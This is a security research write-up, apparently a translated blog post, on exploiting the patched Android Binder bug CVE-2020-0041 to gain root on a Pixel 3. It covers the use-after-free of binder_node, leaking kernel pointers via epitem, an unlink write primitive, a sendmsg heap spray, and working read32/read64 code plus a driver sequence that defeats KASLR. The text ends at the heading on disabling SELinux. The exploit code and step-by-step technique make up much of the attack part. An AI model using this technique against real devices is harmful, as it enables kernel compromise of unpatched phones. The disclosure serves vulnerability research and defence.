An In-Depth Analysis of the Android Binder Out-of-Bounds Access Vulnerability CVE-2020-0041 (Part 2): Obtaining Root Privileges

Introduction

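A few months ago we discovered and exploited a vulnerability in the Binder driver, which we reported to Google on December 10, 2019. The fix was included in the March 2020 Android Security Bulletin under the identifier CVE-2020-0041.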

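In the previous post we analyzed the vulnerability in detail and showed how to use it to escape the Google Chrome sandbox. If you have not read that post yet, we recommend doing so first to understand the bug we are exploiting and the primitives it provides. In this post we focus on how to use the same bug to attack the kernel and obtain root privileges on a Pixel 3 device.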

The Memory Corruption Primitive

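As described in the previous post, an attacker can corrupt parts of a validated Binder transaction while the driver is still processing it. The corrupted values are used at two stages, either of which can be targeted:
1. Once the transaction has been received, it is processed by userspace components: libbinder (or libhwbinder when /dev/hwbinder is used) and the layers above it. This is what we used to attack the Chrome browser process in the previous post.
2. When userspace is done with the transaction buffer, it asks the driver to free it with BC_FREE_BUFFER, which causes the driver to process the transaction buffer.
Let us look at the transaction buffer cleanup code in the Binder driver, keeping in mind that the transaction data may have been corrupted: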

static void binder_transaction_buffer_release(struct binder_proc *proc,
                          struct binder_buffer *buffer,
                          binder_size_t failed_at,
                          bool is_failure)
{
    int debug_id = buffer->debug_id;
    binder_size_t off_start_offset, buffer_offset, off_end_offset;

    binder_debug(BINDER_DEBUG_TRANSACTION,
             "%d buffer release %d, size %zd-%zd, failed at %llx\n",
             proc->pid, buffer->debug_id,
             buffer->data_size, buffer->offsets_size,
             (unsigned long long)failed_at);

    if (buffer->target_node)
[1]     binder_dec_node(buffer->target_node, 1, 0);

    off_start_offset = ALIGN(buffer->data_size, sizeof(void *));
    off_end_offset = is_failure ? failed_at :
                off_start_offset + buffer->offsets_size;
[2]    for (buffer_offset = off_start_offset; buffer_offset < off_end_offset;
         buffer_offset += sizeof(binder_size_t)) {
        struct binder_object_header *hdr;
        size_t object_size;
        struct binder_object object;
        binder_size_t object_offset;

        binder_alloc_copy_from_buffer(&proc->alloc, &object_offset,
                          buffer, buffer_offset,
                          sizeof(object_offset));
        object_size = binder_get_object(proc, buffer,
                        object_offset, &object);
        if (object_size == 0) {
            pr_err("transaction release %d bad object at offset %lld, size %zd\n",
                   debug_id, (u64)object_offset, buffer->data_size);
            continue;
        }
        hdr = &object.hdr;
        switch (hdr->type) {
        case BINDER_TYPE_BINDER:
        case BINDER_TYPE_WEAK_BINDER: {
            struct flat_binder_object *fp;
            struct binder_node *node;

            fp = to_flat_binder_object(hdr);
[3]         node = binder_get_node(proc, fp->binder);
            if (node == NULL) {
                pr_err("transaction release %d bad node %016llx\n",
                       debug_id, (u64)fp->binder);
                break;
            }
            binder_debug(BINDER_DEBUG_TRANSACTION,
                     "        node %d u%016llx\n",
                     node->debug_id, (u64)node->ptr);
[4]         binder_dec_node(node, hdr->type == BINDER_TYPE_BINDER,
                    0);
            binder_put_node(node);
        } break;

...

        case BINDER_TYPE_FDA: {
...
            /*
             * the source data for binder_buffer_object is visible
             * to user-space and the @buffer element is the user
             * pointer to the buffer_object containing the fd_array.
             * Convert the address to an offset relative to
             * the base of the transaction buffer.
             */
[5]         fda_offset =
                (parent->buffer - (uintptr_t)buffer->user_data) +
                fda->parent_offset;
            for (fd_index = 0; fd_index < fda->num_fds;
                 fd_index++) {
                u32 fd;
                binder_size_t offset = fda_offset +
                    fd_index * sizeof(fd);

                binder_alloc_copy_from_buffer(&proc->alloc,
                                  &fd,
                                  buffer,
                                  offset,
                                  sizeof(fd));
[6]             task_close_fd(proc, fd);
            }
        } break;
        default:
            pr_err("transaction release %d bad object type %x\n",
                debug_id, hdr->type);
            break;
        }
    }
}

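At [1], the driver checks whether the transaction has a target Binder node and, if so, decrements its reference count. This is interesting because the node could be freed if its reference count reaches zero, but we do not control this pointer.
At [2], the driver iterates over all objects in the transaction and enters a switch statement that performs the cleanup required for each object type. For BINDER_TYPE_BINDER and BINDER_TYPE_WEAK_BINDER, cleanup consists of looking up the node with fp->binder at [3] and decrementing its reference count at [4]. Because fp->binder is read from the transaction buffer, we can replace it with a different value and thereby drop a node reference earlier than intended. This in turn can lead to a use-after-free (UAF) of a binder_node object.
Finally, for BINDER_TYPE_FDA objects, we could corrupt the parent->buffer field used at [5] and end up closing arbitrary file descriptors in the remote process.
In our exploit, we target the reference count of BINDER_TYPE_BINDER objects to cause a UAF on objects of type struct binder_node. This is exactly the approach we presented at OffensiveCon for the CVE-2019-2205 UAF. However, some of the techniques we used for that earlier vulnerability are no longer available on recent kernels.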
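The effect of a corrupted fp->binder on reference counting can be illustrated with a small userspace model. This is only a sketch: `toy_node`, `toy_get_node` and `toy_release_object` are hypothetical stand-ins invented for this illustration, with a single simplified counter instead of the driver's separate strong, weak and temporary counts.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Toy stand-in for struct binder_node: only the fields this sketch needs. */
struct toy_node {
    uint64_t ptr;      /* userspace identifier, matched against fp->binder */
    int strong_refs;   /* simplified single reference counter */
    bool freed;        /* set once the counter reaches zero */
};

/* Stand-in for binder_get_node(): find a live node by its ptr value. */
struct toy_node *toy_get_node(struct toy_node *nodes, size_t n, uint64_t ptr)
{
    for (size_t i = 0; i < n; i++)
        if (!nodes[i].freed && nodes[i].ptr == ptr)
            return &nodes[i];
    return NULL;
}

/* Stand-in for the BINDER_TYPE_BINDER cleanup: drop one reference on
 * whichever node the (attacker-writable) fp_binder value names. */
void toy_release_object(struct toy_node *nodes, size_t n, uint64_t fp_binder)
{
    struct toy_node *node = toy_get_node(nodes, n, fp_binder);

    if (node == NULL)
        return;
    assert(node->strong_refs > 0);
    if (--node->strong_refs == 0)
        node->freed = true;   /* freed although someone may still point at it */
}
```

If the transaction originally carried node 0x1000 but fp->binder is rewritten to 0x2000 before cleanup, the decrement lands on the wrong node. When that node's only remaining reference belonged to something else, such as a pending transaction targeting it, it is freed while still in use.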

Using Binder to Talk to Ourselves

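The Binder driver is designed so that transactions can only be sent to handles we have received from other processes, or to the context manager (handle 0). Typically, when a client wants to talk to a service, it first requests a handle from the context manager (servicemanager, hwservicemanager or vndservicemanager, one for each of the three Binder domains used in current Android versions).
If a service creates a sub-service or object on behalf of the client, the service sends back a handle so that the client can talk to the new object.
In some cases it is useful to control both ends of the communication, for example to gain better control over the timing of a race condition. In this particular case we also need to know the address of the receiver's Binder mapping while sending the transaction in order to avoid a crash. In addition, for our corruption primitive to produce a UAF, the receiving process must create Binder nodes whose fp->binder field equals the sg_buf value we corrupt with (which belongs to the sender's address space).
The simplest way to satisfy all of these constraints is to control both the sending and the receiving end of the transaction. We then have access to all the required values without needing an information leak to retrieve them from a remote process.
However, unprivileged applications are not allowed to register services through the context manager, so we cannot take that usual route. Instead, we used the ITokenManager service in the /dev/hwbinder domain to set up the communication channel. To our knowledge, this service was first used publicly for this purpose by Gal Beniamini in a Project Zero report: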

Note that in order to pass the binder instance between process A and process B, the "Token Manager" service can be used. This service allows callers to insert binder objects and retrieve
20-byte opaque tokens representing them. Subsequently, callers can supply the same 20-byte token, and retrieve the previously inserted binder object from the service. The service is accessible even to (non-isolated) app contexts (http://androidxref.com/8.0.0_r4/xref/system/sepolicy/private/app.te#188).

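To obtain a handle to a process of our own, we used the same mechanism in our exploit. Note, however, that a "process" here is not an actual process but the Binder structure associated with a Binder file descriptor. This means we can open two Binder file descriptors, create a token through the first one, and retrieve it through the second. At that point the second descriptor holds a handle owned by the first, and we can send Binder transactions between the two.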

Leaking Data Through the binder_node Use-After-Free

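The driver uses Binder nodes in two different ways: as part of the contents of a transaction, in order to pass them from one process to another, and as the target of a transaction. When used as part of a transaction, nodes are looked up in an rb-tree of nodes and are properly reference counted. When we cause the use-after-free of a node, the node is also removed from the rb-tree. For this reason, the only dangling pointers to a freed node we can have are those used as transaction targets, because in that case the driver stores a pointer to the actual binder_node in transaction->target_node.
There are many references to target_node in the Binder driver, but many of them are on the transaction send path or in debug code. Among the rest, the transaction receive path gives us a way to leak some data back to userland: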

        struct binder_transaction_data *trd = &tr.transaction_data;

...

        if (t->buffer->target_node) {
            struct binder_node *target_node = t->buffer->target_node;
            struct binder_priority node_prio;

[1]         trd->target.ptr = target_node->ptr;
            trd->cookie =  target_node->cookie;
            node_prio.sched_policy = target_node->sched_policy;
            node_prio.prio = target_node->min_priority;
            binder_transaction_priority(current, t, node_prio,
                            target_node->inherit_rt);
            cmd = BR_TRANSACTION;
        } else {
            trd->target.ptr = 0;
            trd->cookie = 0;
            cmd = BR_REPLY;
        }

...

[2]     if (copy_to_user(ptr, &tr, trsize)) {
            if (t_from)
                binder_thread_dec_tmpref(t_from);

            binder_cleanup_transaction(t, "copy_to_user failed",
                           BR_FAILED_REPLY);

            return -EFAULT;
        }
        ptr += trsize;

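At [1], the driver copies two 64-bit values from target_node into the transaction_data structure, which is later copied to userland at [2]. Therefore, if we receive a transaction after its target_node has been freed and replaced by another object, we can read two 64-bit fields at the offsets corresponding to ptr and cookie.
If we look at this structure in gdb using a recent Pixel 3 kernel build, we find these fields at offsets 0x58 and 0x60 respectively: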

(gdb) pt /o struct binder_node
/* offset    |  size */  type = struct binder_node {
/*    0      |     4 */    int debug_id;
/*    4      |     4 */    spinlock_t lock;
/*    8      |    24 */    struct binder_work {
/*    8      |    16 */        struct list_head {
/*    8      |     8 */            struct list_head *next;
/*   16      |     8 */            struct list_head *prev;

                                   /* total size (bytes):   16 */
                               } entry;
/*   24      |     4 */        enum {BINDER_WORK_TRANSACTION = 1, BINDER_WORK_TRANSACTION_COMPLETE, BINDER_WORK_RETURN_ERROR, BINDER_WORK_NODE, BINDER_WORK_DEAD_BINDER, BINDER_WORK_DEAD_BINDER_AND_CLEAR, BINDER_WORK_CLEAR_DEATH_NOTIFICATION} type;

                               /* total size (bytes):   24 */
                           } work;
/*   32      |    24 */    union {
/*                24 */        struct rb_node {
/*   32      |     8 */            unsigned long __rb_parent_color;
/*   40      |     8 */            struct rb_node *rb_right;
/*   48      |     8 */            struct rb_node *rb_left;

                                   /* total size (bytes):   24 */
                               } rb_node;
/*                16 */        struct hlist_node {
/*   32      |     8 */            struct hlist_node *next;
/*   40      |     8 */            struct hlist_node **pprev;

                                   /* total size (bytes):   16 */
                               } dead_node;

                               /* total size (bytes):   24 */
                           };
/*   56      |     8 */    struct binder_proc *proc;
/*   64      |     8 */    struct hlist_head {
/*   64      |     8 */        struct hlist_node *first;

                               /* total size (bytes):    8 */
                           } refs;
/*   72      |     4 */    int internal_strong_refs;
/*   76      |     4 */    int local_weak_refs;
/*   80      |     4 */    int local_strong_refs;
/*   84      |     4 */    int tmp_refs;
/*   88      |     8 */    binder_uintptr_t ptr;
/*   96      |     8 */    binder_uintptr_t cookie;
/*  104      |     1 */    struct {
/*  104: 7   |     1 */        u8 has_strong_ref : 1;
/*  104: 6   |     1 */        u8 pending_strong_ref : 1;
/*  104: 5   |     1 */        u8 has_weak_ref : 1;
/*  104: 4   |     1 */        u8 pending_weak_ref : 1;

                               /* total size (bytes):    1 */
                           };
/*  105      |     2 */    struct {
/*  105: 6   |     1 */        u8 sched_policy : 2;
/*  105: 5   |     1 */        u8 inherit_rt : 1;
/*  105: 4   |     1 */        u8 accept_fds : 1;
/*  105: 3   |     1 */        u8 txn_security_ctx : 1;
/* XXX  3-bit hole   */
/*  106      |     1 */        u8 min_priority;

                               /* total size (bytes):    2 */
                           };
/*  107      |     1 */    bool has_async_transaction;
/* XXX  4-byte hole  */
/*  112      |    16 */    struct list_head {
/*  112      |     8 */        struct list_head *next;
/*  120      |     8 */        struct list_head *prev;

                               /* total size (bytes):   16 */
                           } async_todo;

                           /* total size (bytes):  128 */
                         }

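What we need now is an object that we can allocate and free at will and that holds interesting data at these offsets. When we originally reported the bug to Google, we submitted a minimal exploit that overwrote selinux_enforcing and used kgsl_drawobj_sync to leak a pointer to itself and a pointer to a kernel function. That was enough for a PoC, but not for a full root exploit.
For the full exploit we used the same object as in our CVE-2019-2025 exploit: the epitem structure that eventpoll uses to track watched files: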

    (gdb) pt /o struct epitem
    /* offset    |  size */  type = struct epitem {
    /*    0      |    24 */    union {
    /*                24 */        struct rb_node {
    /*    0      |     8 */            unsigned long __rb_parent_color;
    /*    8      |     8 */            struct rb_node *rb_right;
    /*   16      |     8 */            struct rb_node *rb_left;

                                       /* total size (bytes):   24 */
                                   } rbn;
    /*                16 */        struct callback_head {
    /*    0      |     8 */            struct callback_head *next;
    /*    8      |     8 */            void (*func)(struct callback_head *);

                                       /* total size (bytes):   16 */
                                   } rcu;

                                   /* total size (bytes):   24 */
                               };
    /*   24      |    16 */    struct list_head {
    /*   24      |     8 */        struct list_head *next;
    /*   32      |     8 */        struct list_head *prev;

                                   /* total size (bytes):   16 */
                               } rdllink;
    /*   40      |     8 */    struct epitem *next;
    /*   48      |    12 */    struct epoll_filefd {
    /*   48      |     8 */        struct file *file;
    /*   56      |     4 */        int fd;

                                   /* total size (bytes):   12 */
                               } ffd;
    /*   60      |     4 */    int nwait;
    /*   64      |    16 */    struct list_head {
    /*   64      |     8 */        struct list_head *next;
    /*   72      |     8 */        struct list_head *prev;

                                   /* total size (bytes):   16 */
                               } pwqlist;
    /*   80      |     8 */    struct eventpoll *ep;

    /*   88      |    16 */    struct list_head {
    /*   88      |     8 */        struct list_head *next;
    /*   96      |     8 */        struct list_head *prev;

                                   /* total size (bytes):   16 */
                               } fllink;

    /*  104      |     8 */    struct wakeup_source *ws;
    /*  112      |    16 */    struct epoll_event {
    /*  112      |     4 */        __u32 events;
    /* XXX  4-byte hole  */
    /*  120      |     8 */        __u64 data;

                                   /* total size (bytes):   16 */
                               } event;

                               /* total size (bytes):  128 */
                             }

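As shown above, the fllink list head overlaps the leaked fields. Eventpoll uses this list to link together all epitem structures that watch the same struct file, so we can leak two kernel pointers.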
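The overlap can be checked mechanically from the two gdb dumps. The sketch below models both 128-byte objects at the byte level; `node_view`, `epitem_view` and `leak_ptr_cookie` are names made up for this illustration, and pointers are stored as `uint64_t` so that the layout matches the 64-bit kernel regardless of the host.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

struct node_view {          /* models struct binder_node */
    uint8_t  before[88];
    uint64_t ptr;           /* offset 88 (0x58) */
    uint64_t cookie;        /* offset 96 (0x60) */
    uint8_t  after[24];
};

struct epitem_view {        /* models struct epitem */
    uint8_t  before[88];
    uint64_t fllink_next;   /* offset 88 */
    uint64_t fllink_prev;   /* offset 96 */
    uint8_t  after[24];
};

static_assert(sizeof(struct node_view) == 128, "binder_node model is 128 bytes");
static_assert(sizeof(struct epitem_view) == 128, "epitem model is 128 bytes");
static_assert(offsetof(struct node_view, ptr) ==
              offsetof(struct epitem_view, fllink_next), "ptr overlaps fllink.next");
static_assert(offsetof(struct node_view, cookie) ==
              offsetof(struct epitem_view, fllink_prev), "cookie overlaps fllink.prev");

/* What the receive path would report as ptr/cookie if the freed node's
 * slot now held an epitem: the same 128 bytes, read through the stale type. */
void leak_ptr_cookie(const struct epitem_view *slot,
                     uint64_t *ptr, uint64_t *cookie)
{
    struct node_view stale;

    memcpy(&stale, slot, sizeof(stale));
    *ptr = stale.ptr;
    *cookie = stale.cookie;
}
```

Both objects are 128 bytes, so they are plausible replacements for one another in the same allocator size class, and the values returned as ptr and cookie are exactly fllink.next and fllink.prev.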
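There are a couple of cases to consider. If a given struct file has only one epitem attached, the list contains just two elements, the list head inside the struct file and the epitem's fllink, and each points to the other.

Therefore, if we leak the fllink contents of the epitem in this situation, we obtain two identical pointers into the struct file. What happens if a second epitem is attached to the same file?

In that case both fllink entries and the list head in the struct file form a single list, so leaking from both epitems at the same time gives us their addresses as well as the address of the corresponding struct file.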

In our exploit, we use both tricks to disclose the struct file pointer and the addresses of the freed nodes before using them for the write primitive.
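The two cases can be reproduced with a userspace copy of the kernel's circular doubly linked list. This is a sketch under assumptions: the list head is called `f_ep_links` here, following the field name in kernels of that generation, and epitems are assumed to be appended with `list_add_tail` semantics; `toy_file` and `toy_epitem` are illustrative types, not the kernel's.

```c
#include <assert.h>
#include <stddef.h>

struct list_head { struct list_head *next, *prev; };

void init_list_head(struct list_head *h)
{
    h->next = h;
    h->prev = h;
}

/* Same semantics as the kernel's list_add_tail(): insert just before head. */
void list_add_tail(struct list_head *item, struct list_head *head)
{
    item->prev = head->prev;
    item->next = head;
    head->prev->next = item;
    head->prev = item;
}

struct toy_file   { struct list_head f_ep_links; };  /* list head in struct file */
struct toy_epitem { struct list_head fllink; };      /* link inside each epitem  */
```

With a single epitem A, both A.fllink.next and A.fllink.prev equal the address of the list head inside the file. After a second epitem B is added, A leaks (B, head) and B leaks (head, A), which together disclose both epitem addresses and the file address.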

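Note, however, that in order to leak data we need pending transactions to stay queued until we have triggered the bug and freed the binder_node. The exploit achieves this by dedicating a thread to each pending transaction and then decrementing the reference count as many times as needed to free the node. From then on we can perform a leak whenever we need one, up to as many times as the number of pending transactions we created.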

The Memory Write Primitive

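To find a memory write primitive, we turn to another use of the transaction->target_node field: the reference count decrement in binder_transaction_buffer_release. Assume we have replaced the freed node with a fully controlled object. In that case, the driver decrements the node's reference count with the following code: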

static bool binder_dec_node_nilocked(struct binder_node *node,
                     int strong, int internal)
{
    struct binder_proc *proc = node->proc;

    assert_spin_locked(&node->lock);
    if (proc)
        assert_spin_locked(&proc->inner_lock);
    if (strong) {
        if (internal)
            node->internal_strong_refs--;
        else
            node->local_strong_refs--;
        if (node->local_strong_refs || node->internal_strong_refs)
            return false;
    } else {
        if (!internal)
            node->local_weak_refs--;
        if (node->local_weak_refs || node->tmp_refs ||
                !hlist_empty(&node->refs))
            return false;
    }

    if (proc && (node->has_strong_ref || node->has_weak_ref)) {
        if (list_empty(&node->work.entry)) {
            binder_enqueue_work_ilocked(&node->work, &proc->todo);
            binder_wakeup_proc_ilocked(proc);
        }
[1] } else {
        if (hlist_empty(&node->refs) && !node->local_strong_refs &&
            !node->local_weak_refs && !node->tmp_refs) {
            if (proc) {
                binder_dequeue_work_ilocked(&node->work);
                rb_erase(&node->rb_node, &proc->nodes);
                binder_debug(BINDER_DEBUG_INTERNAL_REFS,
                         "refless node %d deleted\n",
                         node->debug_id);
            } else {
[2]             BUG_ON(!list_empty(&node->work.entry));
                spin_lock(&binder_dead_nodes_lock);
                /*
                 * tmp_refs could have changed so
                 * check it again
                 */
                if (node->tmp_refs) {
                    spin_unlock(&binder_dead_nodes_lock);
                    return false;
                }
[3]             hlist_del(&node->dead_node);
                spin_unlock(&binder_dead_nodes_lock);
                binder_debug(BINDER_DEBUG_INTERNAL_REFS,
                         "dead node %d deleted\n",
                         node->debug_id);
            }
            return true;
        }
    }
    return false;
}

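We can set up the node data so that we reach the else branch at [1], making sure node->proc is NULL. In that case we first hit the list_empty check at [2]. To pass it we need an empty list (next and prev both pointing at the list_head itself), which is why we need to leak the node address first.
Once past the check at [2], we reach hlist_del at [3] with controlled data. The function does the following: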

static inline void __hlist_del(struct hlist_node *n)
{
    struct hlist_node *next = n->next;
    struct hlist_node **pprev = n->pprev;

    WRITE_ONCE(*pprev, next);
    if (next)
        next->pprev = pprev;
}

static inline void hlist_del(struct hlist_node *n)
{
    __hlist_del(n);
    n->next = LIST_POISON1;
    n->pprev = LIST_POISON2;
}

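This boils down to the classic unlink primitive, in which we can set *X = Y and *(Y+8) = X. Given two writable kernel addresses, we can therefore use it to corrupt data with them. In addition, if we set next = NULL, we can perform a single 8-byte NULL write with just one kernel address.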
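The unlink primitive is easy to reproduce in userspace. The sketch below copies the logic of `__hlist_del` without `WRITE_ONCE` and without the poisoning done by `hlist_del`; `toy_hlist_del` is a name chosen for this illustration.

```c
#include <assert.h>
#include <stddef.h>

struct hlist_node { struct hlist_node *next, **pprev; };

/* Same logic as the kernel's __hlist_del(). With attacker-chosen
 * n->pprev = X and n->next = Y it performs the two writes from the text. */
void toy_hlist_del(struct hlist_node *n)
{
    struct hlist_node *next = n->next;
    struct hlist_node **pprev = n->pprev;

    *pprev = next;             /* *X = Y                               */
    if (next)
        next->pprev = pprev;   /* *(Y + 8) = X, skipped when Y is NULL */
}
```

In this model X is the address of `slot` and Y is the address of `target`: after the call `slot` holds Y and the `pprev` member of `target` (8 bytes into the structure on a 64-bit target) holds X. With `next == NULL` only the first write happens, which is the single NULL write mentioned above.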

Reallocating the Freed Node with Arbitrary Contents

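In deriving the unlink primitive we assumed that the freed object could be replaced with a controlled one. We do not need full control of the object: it only has to pass all the checks, trigger the hlist_del primitive, and avoid a crash.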
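One way such replacement contents might be laid out is sketched below. The layout is derived only from the checks in binder_dec_node_nilocked and the offsets in the gdb dump shown earlier; it is not taken from the exploit source, `build_fake_node` and its helpers are hypothetical names, and the sketch ignores any constraints imposed by the allocation method used to place the bytes. It assumes a little-endian host.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define NODE_SIZE 128   /* sizeof(struct binder_node) per the gdb dump */

void put64(uint8_t *buf, size_t off, uint64_t v) { memcpy(buf + off, &v, sizeof(v)); }
void put32(uint8_t *buf, size_t off, uint32_t v) { memcpy(buf + off, &v, sizeof(v)); }

/* Fill buf with a fake node that, when one local strong reference is
 * dropped, should reach hlist_del() and perform *where = what.
 * node_kaddr is the leaked kernel address of the slot being replaced. */
void build_fake_node(uint8_t buf[NODE_SIZE], uint64_t node_kaddr,
                     uint64_t where, uint64_t what)
{
    memset(buf, 0, NODE_SIZE);         /* lock, proc, refs.first, other counts = 0 */
    put64(buf, 8,  node_kaddr + 8);    /* work.entry.next -> itself (list_empty)   */
    put64(buf, 16, node_kaddr + 8);    /* work.entry.prev -> itself                */
    put64(buf, 32, what);              /* dead_node.next  (Y)                      */
    put64(buf, 40, where);             /* dead_node.pprev (X)                      */
    put32(buf, 80, 1);                 /* local_strong_refs: reaches 0 on release  */
}
```

Passing `what == 0` gives the single NULL write; any other value also requires `what + 8` to be writable, as explained for the unlink primitive.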
To achieve this we used a well-known technique: spraying control messages through the sendmsg syscall. The relevant code is:

static int ___sys_sendmsg(struct socket *sock, struct user_msghdr __user *msg,
             struct msghdr *msg_sys, unsigned int flags,
             struct used_address *used_address,
             unsigned int allowed_msghdr_flags)
{
    struct compat_msghdr __user *msg_compat =
        (struct compat_msghdr __user *)msg;
    struct sockaddr_storage address;
    struct iovec iovstack[UIO_FASTIOV], *iov = iovstack;
    unsigned char ctl[sizeof(struct cmsghdr) + 20]
        __attribute__ ((aligned(sizeof(__kernel_size_t))));
    /* 20 is size of ipv6_pktinfo */
    unsigned char *ctl_buf = ctl;
    int ctl_len;
    ssize_t err;

...

        if (ctl_len > sizeof(ctl)) {
[1]         ctl_buf = sock_kmalloc(sock->sk, ctl_len, GFP_KERNEL);
            if (ctl_buf == NULL)
                goto out_freeiov;
        }
        err = -EFAULT;
        /*
         * Careful! Before this, msg_sys->msg_control contains a user pointer.
         * Afterwards, it will be a kernel pointer. Thus the compiler-assisted
         * checking falls down on this.
         */
[2]     if (copy_from_user(ctl_buf,
                   (void __user __force *)msg_sys->msg_control,
                   ctl_len))
            goto out_freectl;
        msg_sys->msg_control = ctl_buf;
    }

...


out_freectl:
    if (ctl_buf != ctl)
[3]    sock_kfree_s(sock->sk, ctl_buf, ctl_len);
out_freeiov:
    kfree(iov);
    return err;
}

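If the requested control message length exceeds the local ctl buffer, a buffer is allocated on the kernel heap at [1]. At [2], the control message is copied in from userland. Finally, once the message has been processed, the allocated buffer is freed at [3].
We use a blocking call so that the syscall blocks once the destination socket buffer is full, leaving the thread blocked between [2] and [3]. This lets us control the lifetime of the replacement object.
We could also take the approach Jann Horn used in his PROCA exploit: let the sendmsg call complete and immediately reallocate the object with, for example, a signalfd file descriptor. The advantage is that no separate thread is needed for each allocation, but the result is otherwise very similar.
Either way, this kind of spray lets us reallocate the freed binder_node with almost complete control over its contents, so that we can trigger the write primitive described above.
One thing to note is that if the spray fails, the kernel will end up crashing because of the number of operations and checks performed on the freed memory. However, a nice property of this use-after-free is that as long as we do not trigger the write primitive, we can simply close the Binder file descriptor and the kernel will not notice anything.
So before attempting to trigger the write primitive, we use the leak primitive to verify that the node was reallocated successfully. To do this we only need a large number of pending transactions, reading one of them each time we want to leak some data from the freed object. If the data is not what we expect, we close the Binder file descriptor and try again.
This property makes the exploit very reliable even with a relatively unreliable reallocation.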
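The userspace side of the control-message spray described in this section can be sketched as a single sendmsg call. `spray_ctl` is a hypothetical helper written for this illustration: it uses MSG_DONTWAIT so that the sketch never blocks, whereas the technique described above relies on the call blocking on a full socket buffer, typically with one thread per allocation. Whether a given payload is accepted or rejected with an error depends on how the socket type parses control messages.

```c
#include <assert.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/uio.h>

/* Send one data byte plus len bytes of control data on sock.
 * When len exceeds the small on-stack ctl buffer in ___sys_sendmsg(),
 * the kernel copies the control data into a heap buffer of that size
 * for the duration of the call. */
ssize_t spray_ctl(int sock, void *ctl, size_t len)
{
    char byte = 'A';
    struct iovec iov = { .iov_base = &byte, .iov_len = 1 };
    struct msghdr msg;

    memset(&msg, 0, sizeof(msg));
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = ctl;       /* bytes that end up in the heap buffer */
    msg.msg_controllen = len;    /* selects the allocation size          */
    return sendmsg(sock, &msg, MSG_DONTWAIT);
}
```

A 128-byte payload targets the same allocation size as binder_node. Note that the copy into the heap buffer happens before the control data is parsed, so the bytes reach the heap even when the call later returns an error.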

Obtaining an Arbitrary Read Primitive

Here we use the same arbitrary read technique as in our OffensiveCon 2020 talk: we corrupt file->f_inode and use the following code to read:

int do_vfs_ioctl(struct file *filp, unsigned int fd, unsigned int cmd,
         unsigned long arg)
{
    int error = 0;
    int __user *argp = (int __user *)arg;
    struct inode *inode = file_inode(filp);

    switch (cmd) {

...

    case FIGETBSZ:
        return put_user(inode->i_sb->s_blocksize, argp);

...

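As you can see in our slides, back in late 2018 we used a Binder mapping spray to bypass PAN and place controlled data at a controlled location. However, the bug we are exploiting here was introduced while getting rid of the long-lived kernel-side Binder mappings, which means we can no longer spray Binder mappings and had to find another solution.
The solution we came up with is to point the f_inode field into an epitem structure. This structure contains a fully controllable 64-bit field, event.data, which we can modify with epoll_ctl(efd, EPOLL_CTL_MOD, fd, &event). Therefore, if we line this data field up with inode->i_sb, we get an arbitrary read.
Concretely, f_inode is set to epitem + 80, so that the i_sb field at offset 40 of the fake inode coincides with event.data at offset 120 of the epitem.

Note that this also corrupts the fllink.next field of the epitem, which now points to the file->f_inode field as a side effect of our write primitive. This could cause problems if the field were ever used, but since we are the only users of these struct file and epitem instances, we only need to avoid calling any API that uses them.
With this setup, we can build an arbitrary read primitive as follows: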

uint64_t read32(uint64_t addr) {
   struct epoll_event evt;
   evt.events = 0;
   evt.data.u64 = addr - 24;
   int err = epoll_ctl(file->ep_fd, EPOLL_CTL_MOD, pipes[0], &evt);
   uint32_t test = 0xdeadbeef;
   ioctl(pipes[0], FIGETBSZ, &test);
   return test;
}

uint64_t read64(uint64_t addr) {
   uint32_t lo = read32(addr);
   uint32_t hi = read32(addr+4);

   return (((uint64_t)hi) << 32) | lo;
}

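Note that we set the epitem's data field to addr - 24, where 24 is the offset of s_blocksize within the superblock structure. Also, although s_blocksize is in principle 64 bits long, the ioctl code only copies 32 bits of it back to userland, so we need two reads to obtain a 64-bit value.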
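The address adjustment and the two-step 64-bit read can be modeled in userspace. In this sketch a byte array stands in for kernel memory and a global stands in for the attacker-controlled i_sb value; all `toy_` names are invented for the illustration, and a little-endian host is assumed.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define S_BLOCKSIZE_OFF 24   /* offset of s_blocksize in the superblock, per the text */

static uint8_t  toy_mem[64]; /* stands in for kernel memory; addresses are indexes */
static uint64_t toy_i_sb;    /* stands in for the controlled inode->i_sb pointer   */

/* Models FIGETBSZ: hands back the 32 bits stored at i_sb + 24. */
uint32_t toy_figetbsz(void)
{
    uint32_t v;

    memcpy(&v, &toy_mem[toy_i_sb + S_BLOCKSIZE_OFF], sizeof(v));
    return v;
}

uint32_t toy_read32(uint64_t addr)
{
    toy_i_sb = addr - S_BLOCKSIZE_OFF;  /* done via epoll_ctl(EPOLL_CTL_MOD) in the exploit */
    return toy_figetbsz();
}

/* Two 32-bit reads, low half first, combined into one 64-bit value. */
uint64_t toy_read64(uint64_t addr)
{
    uint64_t lo = toy_read32(addr);
    uint64_t hi = toy_read32(addr + 4);

    return (hi << 32) | lo;
}
```

Subtracting 24 before the read cancels the offset that the ioctl path adds when it dereferences s_blocksize, so the value returned comes from exactly the requested address.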
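Now that we have an arbitrary read and know the address of a struct file from our initial leak, we can simply read its f_op field to retrieve a kernel .text pointer, which fully defeats KASLR: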

/* Step 1: leak a pipe file address */

file = node_new("leak_file");

/* Only works on file implementing the 'epoll' function. */
while (!node_realloc_epitem(file, pipes[0]))
   node_reset(file);

uint64_t file_addr = file->file_addr;
log_info("[+] pipe file: 0x%lx\n", file_addr);


/* Step 2: leak epitem address */
struct exp_node *epitem_node = node_new("epitem");
while (!node_kaddr_disclose(file, epitem_node))
   node_reset(epitem_node);

printf("[*] file epitem at %lx\n", file->kaddr);

/* 
 * Alright, now we want to do a write8 to set file->f_inode.
 * Given the unlink primitive, we'll set file->f_inode = epitem + 80
 * and epitem + 88 = &file->f_inode.
 * 
 * With this we can change f_inode->i_sb by modifying the epitem data, 
 * and get an arbitrary read through ioctl.
 *
 * This is corrupting the fllink, so we better don't touch anything there!
 */

struct exp_node *write8_inode = node_new("write8_inode");
node_write8(write8_inode, file->kaddr + 120 - 40 , file_addr + 0x20);

printf("[*] Write done, should have arbitrary read now.\n");
uint64_t fop = read64(file_addr + 0x28);
printf("[+] file operations: %lx\n", fop);

kernel_base = fop - OFFSET_PIPE_FOP;
printf("[+] kernel base: %lx\n", kernel_base);

Disabling SELinux and Setting Up an Arbitrary Write Primitive

